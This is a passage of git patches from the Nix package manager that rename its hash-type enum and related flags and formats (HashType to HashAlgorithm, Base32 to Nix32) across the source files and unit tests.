: hashSink(ha) , rewritingSink(modulus, std::string(modulus.size(), 0), hashSink) { } diff --git a/src/libutil/references.hh b/src/libutil/references.hh index f0baeffe1..8bc9f7ec9 100644 --- a/src/libutil/references.hh +++ b/src/libutil/references.hh @@ -46,7 +46,7 @@ struct HashModuloSink : AbstractHashSink HashSink hashSink; RewritingSink rewritingSink; - HashModuloSink(HashType ht, const std::string & modulus); + 
HashModuloSink(HashAlgorithm ha, const std::string & modulus); void operator () (std::string_view data) override; diff --git a/src/libutil/source-accessor.cc b/src/libutil/source-accessor.cc index 7813433a7..afbbbe1a9 100644 --- a/src/libutil/source-accessor.cc +++ b/src/libutil/source-accessor.cc @@ -39,11 +39,11 @@ void SourceAccessor::readFile( } Hash SourceAccessor::hashPath( - const CanonPath & path, - PathFilter & filter, - HashType ht) + const CanonPath & path, + PathFilter & filter, + HashAlgorithm ha) { - HashSink sink(ht); + HashSink sink(ha); dumpPath(path, sink, filter); return sink.finish().first; } diff --git a/src/libutil/source-accessor.hh b/src/libutil/source-accessor.hh index 264caab16..3ca12d624 100644 --- a/src/libutil/source-accessor.hh +++ b/src/libutil/source-accessor.hh @@ -97,9 +97,9 @@ struct SourceAccessor PathFilter & filter = defaultPathFilter); Hash hashPath( - const CanonPath & path, - PathFilter & filter = defaultPathFilter, - HashType ht = htSHA256); + const CanonPath & path, + PathFilter & filter = defaultPathFilter, + HashAlgorithm ha = HashAlgorithm::SHA256); /** * Return a corresponding path in the root filesystem, if diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 25f0107bc..75ad4e75f 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -193,7 +193,7 @@ static void opAddFixed(Strings opFlags, Strings opArgs) if (opArgs.empty()) throw UsageError("first argument must be hash algorithm"); - HashType hashAlgo = parseHashType(opArgs.front()); + HashAlgorithm hashAlgo = parseHashAlgo(opArgs.front()); opArgs.pop_front(); for (auto & i : opArgs) @@ -214,7 +214,7 @@ static void opPrintFixedPath(Strings opFlags, Strings opArgs) throw UsageError("'--print-fixed-path' requires three arguments"); Strings::iterator i = opArgs.begin(); - HashType hashAlgo = parseHashType(*i++); + HashAlgorithm hashAlgo = parseHashAlgo(*i++); std::string hash = *i++; std::string name = *i++; @@ -405,7 +405,7 @@ 
static void opQuery(Strings opFlags, Strings opArgs) for (auto & j : maybeUseOutputs(store->followLinksToStorePath(i), useOutput, forceRealise)) { auto info = store->queryPathInfo(j); if (query == qHash) { - assert(info->narHash.type == htSHA256); + assert(info->narHash.algo == HashAlgorithm::SHA256); cout << fmt("%s\n", info->narHash.to_string(HashFormat::Base32, true)); } else if (query == qSize) cout << fmt("%d\n", info->narSize); @@ -541,7 +541,7 @@ static void registerValidity(bool reregister, bool hashGiven, bool canonicalise) if (canonicalise) canonicalisePathMetaData(store->printStorePath(info->path), {}); if (!hashGiven) { - HashResult hash = hashPath(htSHA256, store->printStorePath(info->path)); + HashResult hash = hashPath(HashAlgorithm::SHA256, store->printStorePath(info->path)); info->narHash = hash.first; info->narSize = hash.second; } @@ -763,7 +763,7 @@ static void opVerifyPath(Strings opFlags, Strings opArgs) auto path = store->followLinksToStorePath(i); printMsg(lvlTalkative, "checking path '%s'...", store->printStorePath(path)); auto info = store->queryPathInfo(path); - HashSink sink(info->narHash.type); + HashSink sink(info->narHash.algo); store->narFromPath(path, sink); auto current = sink.finish(); if (current.first != info->narHash) { @@ -979,7 +979,7 @@ static void opServe(Strings opFlags, Strings opArgs) auto deriver = readString(in); ValidPathInfo info { store->parseStorePath(path), - Hash::parseAny(readString(in), htSHA256), + Hash::parseAny(readString(in), HashAlgorithm::SHA256), }; if (deriver != "") info.deriver = store->parseStorePath(deriver); diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index f9d487ada..02de796b5 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -60,11 +60,11 @@ struct CmdAddToStore : MixDryRun, StoreCommand StringSink sink; dumpPath(path, sink); - auto narHash = hashString(htSHA256, sink.s); + auto narHash = hashString(HashAlgorithm::SHA256, sink.s); Hash hash = narHash; if 
(ingestionMethod == FileIngestionMethod::Flat) { - HashSink hsink(htSHA256); + HashSink hsink(HashAlgorithm::SHA256); readFile(path, hsink); hash = hsink.finish().first; } diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 62f96ef1d..638178afa 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -18,7 +18,7 @@ struct CmdHashBase : Command FileIngestionMethod mode; HashFormat hashFormat = HashFormat::SRI; bool truncate = false; - HashType ht = htSHA256; + HashAlgorithm ha = HashAlgorithm::SHA256; std::vector paths; std::optional modulus; @@ -48,7 +48,7 @@ struct CmdHashBase : Command .handler = {&hashFormat, HashFormat::Base16}, }); - addFlag(Flag::mkHashTypeFlag("type", &ht)); + addFlag(Flag::mkHashTypeFlag("type", &ha)); #if 0 addFlag({ @@ -84,9 +84,9 @@ struct CmdHashBase : Command std::unique_ptr hashSink; if (modulus) - hashSink = std::make_unique(ht, *modulus); + hashSink = std::make_unique(ha, *modulus); else - hashSink = std::make_unique(ht); + hashSink = std::make_unique(ha); switch (mode) { case FileIngestionMethod::Flat: @@ -107,7 +107,7 @@ struct CmdHashBase : Command struct CmdToBase : Command { HashFormat hashFormat; - std::optional ht; + std::optional ht; std::vector args; CmdToBase(HashFormat hashFormat) : hashFormat(hashFormat) @@ -139,7 +139,7 @@ struct CmdHashConvert : Command { std::optional from; HashFormat to; - std::optional type; + std::optional type; std::vector hashStrings; CmdHashConvert(): to(HashFormat::SRI) { @@ -166,7 +166,7 @@ struct CmdHashConvert : Command .description = "Specify the algorithm if it can't be auto-detected.", .labels = {"hash algorithm"}, .handler = {[this](std::string str) { - type = parseHashType(str); + type = parseHashAlgo(str); }}, }); expectArgs({ @@ -223,7 +223,7 @@ static auto rCmdHash = registerCommand("hash"); /* Legacy nix-hash command. 
*/ static int compatNixHash(int argc, char * * argv) { - std::optional ht; + std::optional ha; bool flat = false; HashFormat hashFormat = HashFormat::Base16; bool truncate = false; @@ -243,7 +243,7 @@ static int compatNixHash(int argc, char * * argv) else if (*arg == "--truncate") truncate = true; else if (*arg == "--type") { std::string s = getArg(*arg, arg, end); - ht = parseHashType(s); + ha = parseHashAlgo(s); } else if (*arg == "--to-base16") { op = opTo; @@ -270,8 +270,8 @@ static int compatNixHash(int argc, char * * argv) if (op == opHash) { CmdHashBase cmd(flat ? FileIngestionMethod::Flat : FileIngestionMethod::Recursive); - if (!ht.has_value()) ht = htMD5; - cmd.ht = ht.value(); + if (!ha.has_value()) ha = HashAlgorithm::MD5; + cmd.ha = ha.value(); cmd.hashFormat = hashFormat; cmd.truncate = truncate; cmd.paths = ss; @@ -281,7 +281,7 @@ static int compatNixHash(int argc, char * * argv) else { CmdToBase cmd(hashFormat); cmd.args = ss; - if (ht.has_value()) cmd.ht = ht; + if (ha.has_value()) cmd.ht = ha; cmd.run(); } diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index 3ed7946a8..09f33a51e 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -46,13 +46,13 @@ std::string resolveMirrorUrl(EvalState & state, const std::string & url) } std::tuple prefetchFile( - ref store, - std::string_view url, - std::optional name, - HashType hashType, - std::optional expectedHash, - bool unpack, - bool executable) + ref store, + std::string_view url, + std::optional name, + HashAlgorithm hashAlgo, + std::optional expectedHash, + bool unpack, + bool executable) { auto ingestionMethod = unpack || executable ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; @@ -69,7 +69,7 @@ std::tuple prefetchFile( /* If an expected hash is given, the file may already exist in the store. 
*/ if (expectedHash) { - hashType = expectedHash->type; + hashAlgo = expectedHash->algo; storePath = store->makeFixedOutputPath(*name, FixedOutputInfo { .method = ingestionMethod, .hash = *expectedHash, @@ -122,7 +122,7 @@ std::tuple prefetchFile( Activity act(*logger, lvlChatty, actUnknown, fmt("adding '%s' to the store", url)); - auto info = store->addToStoreSlow(*name, tmpFile, ingestionMethod, hashType, expectedHash); + auto info = store->addToStoreSlow(*name, tmpFile, ingestionMethod, hashAlgo, expectedHash); storePath = info.path; assert(info.ca); hash = info.ca->hash; @@ -134,7 +134,7 @@ std::tuple prefetchFile( static int main_nix_prefetch_url(int argc, char * * argv) { { - HashType ht = htSHA256; + HashAlgorithm ha = HashAlgorithm::SHA256; std::vector args; bool printPath = getEnv("PRINT_PATH") == "1"; bool fromExpr = false; @@ -155,7 +155,7 @@ static int main_nix_prefetch_url(int argc, char * * argv) printVersion("nix-prefetch-url"); else if (*arg == "--type") { auto s = getArg(*arg, arg, end); - ht = parseHashType(s); + ha = parseHashAlgo(s); } else if (*arg == "--print-path") printPath = true; @@ -233,10 +233,10 @@ static int main_nix_prefetch_url(int argc, char * * argv) std::optional expectedHash; if (args.size() == 2) - expectedHash = Hash::parseAny(args[1], ht); + expectedHash = Hash::parseAny(args[1], ha); auto [storePath, hash] = prefetchFile( - store, resolveMirrorUrl(*state, url), name, ht, expectedHash, unpack, executable); + store, resolveMirrorUrl(*state, url), name, ha, expectedHash, unpack, executable); stopProgressBar(); @@ -258,7 +258,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON std::string url; bool executable = false; std::optional name; - HashType hashType = htSHA256; + HashAlgorithm hashAlgo = HashAlgorithm::SHA256; std::optional expectedHash; CmdStorePrefetchFile() @@ -275,11 +275,11 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON .description = "The expected hash of the file.", .labels = {"hash"}, .handler = 
{[&](std::string s) { - expectedHash = Hash::parseAny(s, hashType); + expectedHash = Hash::parseAny(s, hashAlgo); }} }); - addFlag(Flag::mkHashTypeFlag("hash-type", &hashType)); + addFlag(Flag::mkHashTypeFlag("hash-type", &hashAlgo)); addFlag({ .longName = "executable", @@ -305,7 +305,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON } void run(ref store) override { - auto [storePath, hash] = prefetchFile(store, url, name, hashType, expectedHash, false, executable); + auto [storePath, hash] = prefetchFile(store, url, name, hashAlgo, expectedHash, false, executable); if (json) { auto res = nlohmann::json::object(); diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 147b4680b..9d9492da9 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -216,7 +216,7 @@ struct ProfileManifest StringSink sink; dumpPath(tempDir, sink); - auto narHash = hashString(htSHA256, sink.s); + auto narHash = hashString(HashAlgorithm::SHA256, sink.s); ValidPathInfo info { *store, diff --git a/src/nix/verify.cc b/src/nix/verify.cc index 78cb765ce..cd0f6d95f 100644 --- a/src/nix/verify.cc +++ b/src/nix/verify.cc @@ -98,7 +98,7 @@ struct CmdVerify : StorePathsCommand if (!noContents) { - auto hashSink = HashSink(info->narHash.type); + auto hashSink = HashSink(info->narHash.algo); store->narFromPath(info->path, hashSink); diff --git a/tests/unit/libstore/common-protocol.cc b/tests/unit/libstore/common-protocol.cc index c09ac6a3e..d23805fc3 100644 --- a/tests/unit/libstore/common-protocol.cc +++ b/tests/unit/libstore/common-protocol.cc @@ -84,15 +84,15 @@ CHARACTERIZATION_TEST( (std::tuple { ContentAddress { .method = TextIngestionMethod {}, - .hash = hashString(HashType::htSHA256, "Derive(...)"), + .hash = hashString(HashAlgorithm::SHA256, "Derive(...)"), }, ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, ContentAddress { .method = 
FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), }, })) @@ -179,7 +179,7 @@ CHARACTERIZATION_TEST( std::optional { ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, }, })) diff --git a/tests/unit/libstore/derivation.cc b/tests/unit/libstore/derivation.cc index a7f4488fa..7a4b1403a 100644 --- a/tests/unit/libstore/derivation.cc +++ b/tests/unit/libstore/derivation.cc @@ -134,7 +134,7 @@ TEST_JSON(DynDerivationTest, caFixedText, TEST_JSON(CaDerivationTest, caFloating, (DerivationOutput::CAFloating { .method = FileIngestionMethod::Recursive, - .hashType = htSHA256, + .hashAlgo = HashAlgorithm::SHA256, }), "drv-name", "output-name") @@ -145,7 +145,7 @@ TEST_JSON(DerivationTest, deferred, TEST_JSON(ImpureDerivationTest, impure, (DerivationOutput::Impure { .method = FileIngestionMethod::Recursive, - .hashType = htSHA256, + .hashAlgo = HashAlgorithm::SHA256, }), "drv-name", "output-name") diff --git a/tests/unit/libstore/nar-info.cc b/tests/unit/libstore/nar-info.cc index 4f124e89e..bd10602e7 100644 --- a/tests/unit/libstore/nar-info.cc +++ b/tests/unit/libstore/nar-info.cc @@ -26,7 +26,7 @@ static NarInfo makeNarInfo(const Store & store, bool includeImpureInfo) { "foo", FixedOutputInfo { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), .references = { .others = { diff --git a/tests/unit/libstore/path-info.cc b/tests/unit/libstore/path-info.cc index 18f00ca19..80d6fcfed 100644 --- a/tests/unit/libstore/path-info.cc +++ b/tests/unit/libstore/path-info.cc @@ -25,7 +25,7 @@ static UnkeyedValidPathInfo makePathInfo(const Store & store, bool includeImpure "foo", FixedOutputInfo { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + 
.hash = hashString(HashAlgorithm::SHA256, "(...)"), .references = { .others = { diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index c8ac87a04..6d2054f7d 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -53,15 +53,15 @@ VERSIONED_CHARACTERIZATION_TEST( (std::tuple { ContentAddress { .method = TextIngestionMethod {}, - .hash = hashString(HashType::htSHA256, "Derive(...)"), + .hash = hashString(HashAlgorithm::SHA256, "Derive(...)"), }, ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, ContentAddress { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), }, })) @@ -271,7 +271,7 @@ VERSIONED_CHARACTERIZATION_TEST( std::optional { ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, }, })) diff --git a/tests/unit/libstore/worker-protocol.cc b/tests/unit/libstore/worker-protocol.cc index ad5943c69..91f804f0c 100644 --- a/tests/unit/libstore/worker-protocol.cc +++ b/tests/unit/libstore/worker-protocol.cc @@ -55,15 +55,15 @@ VERSIONED_CHARACTERIZATION_TEST( (std::tuple { ContentAddress { .method = TextIngestionMethod {}, - .hash = hashString(HashType::htSHA256, "Derive(...)"), + .hash = hashString(HashAlgorithm::SHA256, "Derive(...)"), }, ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, ContentAddress { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), }, })) @@ -464,7 +464,7 @@ VERSIONED_CHARACTERIZATION_TEST( "foo", FixedOutputInfo { 
.method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), .references = { .others = { StorePath { @@ -539,7 +539,7 @@ VERSIONED_CHARACTERIZATION_TEST( std::optional { ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, }, })) diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc index 551a2d105..141a55816 100644 --- a/tests/unit/libutil/git.cc +++ b/tests/unit/libutil/git.cc @@ -95,7 +95,7 @@ const static Tree tree = { { .mode = Mode::Regular, // hello world with special chars from above - .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", htSHA1), + .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1), }, }, { @@ -103,7 +103,7 @@ const static Tree tree = { { .mode = Mode::Executable, // ditto - .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", htSHA1), + .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1), }, }, { @@ -111,7 +111,7 @@ const static Tree tree = { { .mode = Mode::Directory, // Empty directory hash - .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", htSHA1), + .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1), }, }, }; @@ -174,7 +174,7 @@ TEST_F(GitTest, both_roundrip) { std::function dumpHook; dumpHook = [&](const CanonPath & path) { StringSink s; - HashSink hashSink { htSHA1 }; + HashSink hashSink { HashAlgorithm::SHA1 }; TeeSink s2 { s, hashSink }; auto mode = dump( files, path, s2, dumpHook, diff --git a/tests/unit/libutil/hash.cc b/tests/unit/libutil/hash.cc index 92291afce..4d82c7f09 100644 --- a/tests/unit/libutil/hash.cc +++ b/tests/unit/libutil/hash.cc @@ -13,28 +13,28 @@ namespace nix { TEST(hashString, testKnownMD5Hashes1) { // values taken from: 
https://tools.ietf.org/html/rfc1321 auto s1 = ""; - auto hash = hashString(HashType::htMD5, s1); + auto hash = hashString(HashAlgorithm::MD5, s1); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "md5:d41d8cd98f00b204e9800998ecf8427e"); } TEST(hashString, testKnownMD5Hashes2) { // values taken from: https://tools.ietf.org/html/rfc1321 auto s2 = "abc"; - auto hash = hashString(HashType::htMD5, s2); + auto hash = hashString(HashAlgorithm::MD5, s2); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "md5:900150983cd24fb0d6963f7d28e17f72"); } TEST(hashString, testKnownSHA1Hashes1) { // values taken from: https://tools.ietf.org/html/rfc3174 auto s = "abc"; - auto hash = hashString(HashType::htSHA1, s); + auto hash = hashString(HashAlgorithm::SHA1, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true),"sha1:a9993e364706816aba3e25717850c26c9cd0d89d"); } TEST(hashString, testKnownSHA1Hashes2) { // values taken from: https://tools.ietf.org/html/rfc3174 auto s = "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq"; - auto hash = hashString(HashType::htSHA1, s); + auto hash = hashString(HashAlgorithm::SHA1, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true),"sha1:84983e441c3bd26ebaae4aa1f95129e5e54670f1"); } @@ -42,7 +42,7 @@ namespace nix { // values taken from: https://tools.ietf.org/html/rfc4634 auto s = "abc"; - auto hash = hashString(HashType::htSHA256, s); + auto hash = hashString(HashAlgorithm::SHA256, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "sha256:ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"); } @@ -50,7 +50,7 @@ namespace nix { TEST(hashString, testKnownSHA256Hashes2) { // values taken from: https://tools.ietf.org/html/rfc4634 auto s = "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq"; - auto hash = hashString(HashType::htSHA256, s); + auto hash = hashString(HashAlgorithm::SHA256, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), 
"sha256:248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1"); } @@ -58,7 +58,7 @@ namespace nix { TEST(hashString, testKnownSHA512Hashes1) { // values taken from: https://tools.ietf.org/html/rfc4634 auto s = "abc"; - auto hash = hashString(HashType::htSHA512, s); + auto hash = hashString(HashAlgorithm::SHA512, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "sha512:ddaf35a193617abacc417349ae20413112e6fa4e89a9" "7ea20a9eeee64b55d39a2192992a274fc1a836ba3c23a3feebbd" @@ -68,7 +68,7 @@ namespace nix { // values taken from: https://tools.ietf.org/html/rfc4634 auto s = "abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmnhijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu"; - auto hash = hashString(HashType::htSHA512, s); + auto hash = hashString(HashAlgorithm::SHA512, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "sha512:8e959b75dae313da8cf4f72814fc143f8f7779c6eb9f7fa1" "7299aeadb6889018501d289e4900f7e4331b99dec4b5433a" From 837b889c41543b32154ceade2363ec6ad6dff15d Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 14:41:44 +0100 Subject: [PATCH 060/654] Further HashType renaming + using mkHashAlgoOptFlag for new conversion https://github.com/NixOS/nix/issues/8876 --- src/libutil/args.cc | 38 +++++++++++++++++++------------------- src/libutil/args.hh | 4 ++-- src/nix/hash.cc | 17 +++++------------ src/nix/prefetch.cc | 2 +- 4 files changed, 27 insertions(+), 34 deletions(-) diff --git a/src/libutil/args.cc b/src/libutil/args.cc index ac3727d11..7ea1647d9 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -544,36 +544,36 @@ nlohmann::json Args::toJSON() return res; } -static void hashTypeCompleter(AddCompletions & completions, size_t index, std::string_view prefix) +static void hashAlgoCompleter(AddCompletions & completions, size_t index, std::string_view prefix) { for (auto & type : hashAlgorithms) if (hasPrefix(type, prefix)) completions.add(type); } -Args::Flag Args::Flag::mkHashTypeFlag(std::string 
&& longName, HashAlgorithm * ha) +Args::Flag Args::Flag::mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha) { - return Flag { - .longName = std::move(longName), - .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512')", - .labels = {"hash-algo"}, - .handler = {[ha](std::string s) { - *ha = parseHashAlgo(s); - }}, - .completer = hashTypeCompleter, + return Flag{ + .longName = std::move(longName), + .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512')", + .labels = {"hash-algo"}, + .handler = {[ha](std::string s) { + *ha = parseHashAlgo(s); + }}, + .completer = hashAlgoCompleter, }; } -Args::Flag Args::Flag::mkHashTypeOptFlag(std::string && longName, std::optional * oha) +Args::Flag Args::Flag::mkHashAlgoOptFlag(std::string && longName, std::optional * oha) { - return Flag { - .longName = std::move(longName), - .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512'). Optional as can also be gotten from SRI hash itself.", - .labels = {"hash-algo"}, - .handler = {[oha](std::string s) { - *oha = std::optional {parseHashAlgo(s) }; - }}, - .completer = hashTypeCompleter, + return Flag{ + .longName = std::move(longName), + .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512'). 
Optional as can also be gotten from SRI hash itself.", + .labels = {"hash-algo"}, + .handler = {[oha](std::string s) { + *oha = std::optional{parseHashAlgo(s)}; + }}, + .completer = hashAlgoCompleter, }; } diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 0cff76158..653a9bbd6 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -175,8 +175,8 @@ protected: std::optional experimentalFeature; - static Flag mkHashTypeFlag(std::string && longName, HashAlgorithm * ha); - static Flag mkHashTypeOptFlag(std::string && longName, std::optional * oha); + static Flag mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha); + static Flag mkHashAlgoOptFlag(std::string && longName, std::optional * oha); }; /** diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 638178afa..173043c8a 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -48,7 +48,7 @@ struct CmdHashBase : Command .handler = {&hashFormat, HashFormat::Base16}, }); - addFlag(Flag::mkHashTypeFlag("type", &ha)); + addFlag(Flag::mkHashAlgoFlag("type", &ha)); #if 0 addFlag({ @@ -112,7 +112,7 @@ struct CmdToBase : Command CmdToBase(HashFormat hashFormat) : hashFormat(hashFormat) { - addFlag(Flag::mkHashTypeOptFlag("type", &ht)); + addFlag(Flag::mkHashAlgoOptFlag("type", &ht)); expectArgs("strings", &args); } @@ -139,7 +139,7 @@ struct CmdHashConvert : Command { std::optional from; HashFormat to; - std::optional type; + std::optional algo; std::vector hashStrings; CmdHashConvert(): to(HashFormat::SRI) { @@ -161,14 +161,7 @@ struct CmdHashConvert : Command to = parseHashFormat(str); }}, }); - addFlag({ - .longName = "algo", - .description = "Specify the algorithm if it can't be auto-detected.", - .labels = {"hash algorithm"}, - .handler = {[this](std::string str) { - type = parseHashAlgo(str); - }}, - }); + addFlag(Args::Flag::mkHashAlgoOptFlag("algo", &algo)); expectArgs({ .label = "hashes", .handler = {&hashStrings}, @@ -184,7 +177,7 @@ struct CmdHashConvert : Command void run() override { for 
(const auto& s: hashStrings) { - Hash h = Hash::parseAny(s, type); + Hash h = Hash::parseAny(s, algo); if (from && h.to_string(*from, from == HashFormat::SRI) != s) { auto from_as_string = printHashFormat(*from); throw BadHash("input hash '%s' does not have the expected format '--from %s'", s, from_as_string); diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index 09f33a51e..bbfeb8aa4 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -279,7 +279,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON }} }); - addFlag(Flag::mkHashTypeFlag("hash-type", &hashAlgo)); + addFlag(Flag::mkHashAlgoFlag("hash-type", &hashAlgo)); addFlag({ .longName = "executable", From fc6f29053aa69b6b14bcad93cb273b1c266e74fe Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 15:38:15 +0100 Subject: [PATCH 061/654] Renamed HashFormat::Base32 to HashFormat::Nix32 ...and also adjusted parsing accordingly. Also added CLI completion for HashFormats. https://github.com/NixOS/nix/issues/8876 --- src/libexpr/primops/fetchTree.cc | 2 +- src/libfetchers/git.cc | 2 +- src/libfetchers/mercurial.cc | 2 +- src/libstore/binary-cache-store.cc | 4 +- src/libstore/build/local-derivation-goal.cc | 2 +- src/libstore/content-address.cc | 2 +- src/libstore/derivations.cc | 2 +- src/libstore/downstream-placeholder.cc | 4 +- src/libstore/export-import.cc | 2 +- src/libstore/gc.cc | 2 +- src/libstore/local-store.cc | 10 +- src/libstore/nar-info-disk-cache.cc | 4 +- src/libstore/nar-info.cc | 4 +- src/libstore/optimise-store.cc | 4 +- src/libstore/parsed-derivations.cc | 2 +- src/libstore/path-info.cc | 6 +- src/libstore/path.cc | 2 +- src/libutil/args.cc | 40 ++++++- src/libutil/args.hh | 3 + src/libutil/hash.cc | 25 ++-- src/libutil/hash.hh | 10 +- src/libutil/references.cc | 4 +- src/nix-store/nix-store.cc | 8 +- src/nix/hash.cc | 40 +++---- src/nix/verify.cc | 4 +- tests/functional/hash.sh | 6 +- .../lang/eval-okay-convertHash.err.exp | 108 ++++++++++++++++++ 
.../functional/lang/eval-okay-convertHash.exp | 2 +- .../functional/lang/eval-okay-convertHash.nix | 2 + tests/unit/libutil/hash.cc | 2 +- 30 files changed, 228 insertions(+), 82 deletions(-) create mode 100644 tests/functional/lang/eval-okay-convertHash.err.exp diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index ef80c634f..15f870a95 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -304,7 +304,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v : hashFile(HashAlgorithm::SHA256, state.store->toRealPath(storePath)); if (hash != *expectedHash) state.debugThrowLastTrace(EvalError((unsigned int) 102, "hash mismatch in file downloaded from '%s':\n specified: %s\n got: %s", - *url, expectedHash->to_string(HashFormat::Base32, true), hash.to_string(HashFormat::Base32, true))); + *url, expectedHash->to_string(HashFormat::Nix32, true), hash.to_string(HashFormat::Nix32, true))); } state.allowAndSetStorePathString(storePath, v); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index a89acc1c0..9e6ba8963 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -52,7 +52,7 @@ bool touchCacheFile(const Path & path, time_t touch_time) Path getCachePath(std::string_view key) { return getCacheDir() + "/nix/gitv3/" + - hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Base32, false); + hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Nix32, false); } // Returns the name of the HEAD branch. 
diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc index 713f24bbb..6056b9a3c 100644 --- a/src/libfetchers/mercurial.cc +++ b/src/libfetchers/mercurial.cc @@ -267,7 +267,7 @@ struct MercurialInputScheme : InputScheme } } - Path cacheDir = fmt("%s/nix/hg/%s", getCacheDir(), hashString(HashAlgorithm::SHA256, actualUrl).to_string(HashFormat::Base32, false)); + Path cacheDir = fmt("%s/nix/hg/%s", getCacheDir(), hashString(HashAlgorithm::SHA256, actualUrl).to_string(HashFormat::Nix32, false)); /* If this is a commit hash that we already have, we don't have to pull again. */ diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index f287d72a8..2837e8934 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -165,8 +165,8 @@ ref BinaryCacheStore::addToStoreCommon( auto [fileHash, fileSize] = fileHashSink.finish(); narInfo->fileHash = fileHash; narInfo->fileSize = fileSize; - 